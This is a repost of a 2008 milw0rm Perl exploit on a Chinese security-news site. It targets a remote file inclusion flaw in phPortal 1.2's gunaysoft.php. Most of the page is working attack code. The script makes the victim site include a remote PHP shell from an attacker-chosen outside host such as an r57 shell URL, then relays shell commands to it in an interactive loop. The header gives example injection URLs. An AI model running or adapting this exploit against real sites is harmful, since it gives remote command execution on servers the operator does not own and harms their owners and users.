phPortal 1.2 Multiple Remote File Inclusions Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

phPortal 1.2 Multiple Remote File Inclusions Exploit

来源：milw0rm.com 作者：Ciph3r 发布时间：2008-07-03

#!/usr/bin/perl

####################################################################################################
#
# phportal_1.2_Beta (gunaysoft.php) Remote File Include Vulnerability
#
# Discovered by : Ciph3r
#
# Class: Remote File Include Vulnerability
#
# exemplary Exp:
# http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=[shell]
# http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?sayfaid=[shell]
# http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
#
# Remote: Yes
#
# Type:   Highly critical
#
# Vulnerable Code: include($icerikyolu.$sayfaid.$uzanti);
#
# Download: http://sourceforge.net/project/showfiles.php?group_id=205263
#
# SP tanx4: Iranian hacker & Kurdish security TEAM
#
# sp TANX2: milw0rm.com & google.com & sourceforge.net
#
# Exploit: phportal.pl
#
# About phPortal :
#
# phPortal is a Content Management System. phPortal contains phpBB2 core and
# phPortal shell. If you have a phpBB2 forum.You may upgrade to phPortal.
#
######################################################################################################

use LWP::UserAgent;
use LWP::Simple;

$target = @ARGV[0];
$shellsite = @ARGV[1];
$shellcmd = @ARGV[2];
$file = "sablonlar/gunaysoft/gunaysoft.php?uzanti=";

if(!$target || !$shellsite)
{
    usage();
}

header();

print "Type 'exit' to quit";
print "[cmd]\$";
$cmd = <STDIN>;

while ($cmd !~ "exit")
{
    $xpl = LWP::UserAgent->new() or die;
        $req = HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd) or die("\n\n Failed to connect.");
        $res = $xpl->request($req);
        $r = $res->content;
        $r =~ tr/[\n]/[ê]/;

    if (@ARGV[4] eq "-r")
    {
        print $r;
    }
    elsif (@ARGV[5] eq "-p")
    {
    # if not working change cmd variable to null and apply patch manually.
    $cmd = "echo if(basename(__FILE__) == basename(\$_SERVER['PHP_SELF'])) die(); >> list_last.inc";
    print q
    {

    }
    }
    else
    {
    print "[cmd]\$";
    $cmd = <STDIN>;
    }
}

sub header()
{
    print q
    {
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

                        Discovered by : Ciph3r
                  phportal.pl   - Remote File Include Exploit
                  SP tanx4: Iranian hacker & Kurdish security TEAM
                          Ciph3r_blackhat@yahoo.com
                  sp TANX2: milw0rm.com & google.com & sourceforge.net
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    };
}

sub usage()
{
header();
    print q
    {
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Usage:
perl phportal.pl <Target website> <Shell Location> <CMD Variable> <-r> <-p>
<Target Website> - Path to target eg: www.victim.com
<Shell Location> - Path to shell eg: http://h1.ripway.com/boukan/r57.txt?
<CMD Variable> - Shell command variable name eg: Pwd
<r> - Show output from shell
<p> - sablonlar/gunaysoft/gunaysoft.php
Example:
perl phportal.pl http://localhost/include http://localhost/r57.php cmd -r -p
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    };
exit();
}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告